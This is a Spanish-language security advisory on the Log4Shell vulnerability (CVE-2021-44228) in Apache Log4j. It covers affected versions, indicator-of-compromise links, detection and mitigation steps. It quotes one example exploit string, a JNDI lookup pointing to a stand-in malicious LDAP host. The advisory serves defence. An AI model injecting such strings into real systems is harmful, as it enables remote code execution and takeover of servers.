El 9 de diciembre se informó de una vulnerabilidad crítica de ejecución remota de código (RCE) en el paquete de registro de Apache Log4j 2 versiones 2.14.1 e inferiores.

Apache Log4j es la biblioteca de registro java más popular, con más de 400.000 descargas en su proyecto GitHub. Es utilizada por un gran número de empresas en todo el mundo, permitiendo el registro en un amplio conjunto de aplicaciones populares.

Explotar esta vulnerabilidad es sencillo y permite a los ciberatacantes controlar servidores web basados en java y lanzar ataques de ejecución remota de código.

La biblioteca Log4j está integrada en casi todos los servicios o aplicaciones de Internet que conocemos, como Twitter, Amazon, Microsoft, Minecraft y otros.

En la actualidad la mayoría de los ataques se centran en el uso de la minería de criptomonedas a costa de las víctimas.

Indicadores de Compromiso (IoC)

En los siguientes enlaces se podrá obtener más información a los nuevos Indicadores de Compromisos que diferentes actores de amenazas están utlizando para la ejecución de la vulnerabilidad:

• https://github.com/NCSC-NL/log4shell
• https://github.com/curated-intel/Log4Shell-IOCs
• https://pastebin.com/QADArZXJ

La vulnerabilidad ha sido asignada como CVE-2021-44228 y con una puntuación CVSS de 10 sobre 10. El ciberatacante, para poder explotarla, requiere que la aplicación registre una cadena especial, una serie de caracteres por ejemplo: ${jndi:ldap://sitio-malicioso.com/exp}. Matthew Prince especialista en Seguridad Informática, en su perfil de Twitter, informa de evidencias de que el exploit estaba disponible al menos 9 días antes de su publicación.

Al día de hoy hay muchos atacantes que están explotando la vulnerabilidad Log4Shell y poder llevar a cabo sus ataques. Pueden, por ejemplo, instalar mineros de criptomonedas en un servidor, convertir los dispositivos afectados en una botnet, introducir algún tipo de malware hasta tomar control remoto de los sistemas afectados

Cómo Detectar esta vulnerabilidad

Hay varias formas de hacerlo y una de las más sencillas es conocer la versión de Log4j que tiene instalada. Las vulnerables van desde la 2.0-beta9 hasta la 2.14.1.

Además, en GitHub podemos encontrar los pasos para ejecutar comandos y detectar si la vulnerabilidad registrada como CVE-2021-44228 está presente o no. Este escáner basado en Python actúa como detector de la vulnerabilidad Log4Shell.

Cómo remediar esta vulnerabilidad

Apache Software Foundation ha publicado un aviso de seguridad para solucionar una vulnerabilidad de ejecución remota de código (CVE-2021-44228) que afecta a las versiones 2.0-beta9 a 2.14.1 de Log4j. CISA recomienda a los usuarios y administradores a revisar el anuncio de Apache Log4j 2.15.0 y actualizar a Log4j 2.15.0 o aplicar las mitigaciones recomendadas inmediatamente.

Recomendaciones:

Se recomienda validar junto con fabricantes que sistemas de los utilizados puedan estar siendo vulnerables y la forma de ejecutar el parche de esta y actualizar las Firmas de los IPS u otras herramientas tipo Zero Day para que ayuden a detectar tráfico o comportamientos relacionados. Si no se puede parchar de manera inmediata las instancias vulnerables, puede ser mitigada a través de los siguientes pasos:

• Para >=2.10, establezca la propiedad del sistema log4j2.formatMsgNoLookups a true.
• Para >=2.10, establezca la variable de entorno LOG4J_FORMAT_MSG_NO_LOOKUPS a true
• Para     las    versiones   2.0-beta9   a     2.10.0,   elimine JndiLookup.class de la ruta de clases:zip -q -d log4j core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
• Limitar el tráfico de salida a Internet sólo desde los puertos necesarios.

Para más información puede consultar las siguientes fuentes asociadas a la noticia:

• https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/
• https://socradar.io/what-do-you-know-about-the-log4j-critical-vulnerability-and-what-can-we-do/#8-Are-There-Any-IOCs-that-the-SOC-Teams-Can-Use-to-Prevent-Exploitation-of-the-Vulnerability-on-Internet-Exposed-Servers
• https://www.larazon.es/tecnologia/20211212/emnq6z4rejgu5fsnerxwbfdesq.html?outputType=amp
• https://www.ccn-cert.cni.es/seguridad-al-dia/alertas-ccn-cert/11435-ccn-cert-al-09-21-vulnerabilidad-en-apache-log4j-2.html
• https://kc.mcafee.com/corporate/index?page=content&id=KB95091
• https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk176865&partition=Basic&product=IPS
• https://www.fortinet.com/blog/psirt-blogs/apache-log4j-vulnerability
• https://blog.segu-info.com.ar/2021/12/log4shell-vulnerabilidad-critica-con.html
• https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html